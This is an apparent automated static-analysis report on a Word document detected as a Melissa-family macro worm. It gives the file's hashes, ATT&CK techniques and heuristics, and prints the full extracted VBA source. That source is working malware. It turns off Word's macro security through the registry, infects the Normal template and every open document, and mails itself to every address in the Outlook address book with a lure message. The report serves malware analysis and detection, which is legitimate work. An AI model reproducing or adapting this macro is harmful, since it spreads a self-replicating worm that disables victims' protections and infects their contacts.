Win.Trojan.Melissa-10 — Office (OLE) malware analysis

Static analysis result for SHA-256 1605ab8141984841…

Verdict: MALICIOUS
File type: Office (OLE)
Risk Score: 260

Size: 71.5 KB
Created: 2001-07-27 13:10:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14

MD5: b6314c691d4bdc24d192fc40ff534534
SHA-1: fb8f66a0c0804f0a2b9e89e3a746ad6d14fa27dd
SHA-256: 1605ab814198484153c9740f5d02b6baef01cdd31f24edafa979d33ae542a8dd

Malware Insights

Win.Trojan.Melissa-10 · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder
  • T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, which is designed to execute automatically when the document is opened. This macro attempts to modify the Word Normal template to establish persistence and potentially spread via Outlook by creating an Outlook.Application object. The ClamAV detection of 'Win.Trojan.Melissa-10' strongly suggests this family.

Heuristics 5

  • ClamAV: Win.Trojan.Psycho-3 | critical | CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected | medium | 3 related findings | OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro | high | OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call | high | OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2554 bytes

SHA-256: b7be5b357a29906d53e28cec46dac20cde5f6876adad7d02c57f873514c365da
Detection: ClamAV: Doc.Trojan.Melissa-10
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):

Attribute VB_Name = "Melissa"
Attribute VB_Base = "1Normal.Melissa"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
'Anti-Smyser'
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = 0: Options.VirusProtection = 0: Options.SaveNormalPrompt = 0
End If
Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
NTL = NT.CodeModule.CountOfLines
If NT.CodeModule.Lines(11, 1) <> "NTL = NT.CodeModule.CountOfLines" Then
    Set Sr = MacroContainer.VBProject.VBComponents.Item(1)
    SrL = Sr.CodeModule.CountOfLines
    If NTL > 0 Then NT.CodeModule.DeleteLines 1, NTL
    NT.CodeModule.InsertLines 1, Sr.CodeModule.Lines(1, SrL)
    NT.Name = "Melissa"
End If
If NormalTemplate.Saved = False Then NormalTemplate.Save
For k = 1 To Application.Documents.Count
    Set kD = Application.Documents.Item(k).VBProject.VBComponents.Item(1)
    kDL = kD.CodeModule.CountOfLines
    If kD.CodeModule.Lines(11, 1) <> "NTL = NT.CodeModule.CountOfLines" Then
        If kDL > 0 Then kD.CodeModule.DeleteLines 1, kDL
        kD.CodeModule.InsertLines 1, NT.CodeModule.Lines(1, NTL)
    End If
    kD.Name = "Melissa"
Next k
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Cruson") <> "I remembered our old fucking dog last night" Then
Dim OL, mapi, msg
Set OL = CreateObject("Outlook.Application")
Set mapi = OL.GetNameSpace("MAPI")
If OL = "Outlook" Then
mapi.Logon "profile", "password"
Set AB = mapi.AddressLists(0)
Set msg = OL.CreateItem(0)
For i = 1 To AB.AddressEntries.Count
    Peep = AB.AddressEntries(i)
    msg.Recipients.Add Peep
Next i
msg.Body = "I remembered something last night. It is very, very important document. Look in attachment."
msg.Subject = "From " & Application.UserName
msg.Attachments.Add ActiveDocument.FullName
msg.Send
Peep = ""
mapi.Logoff
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Cruson") = "I remembered our old fucking dog last night"
End If
End If
End Sub
Private Sub Document_Close()
    Document_Open
End Sub
Private Sub Document_New()
    Document_Open
End Sub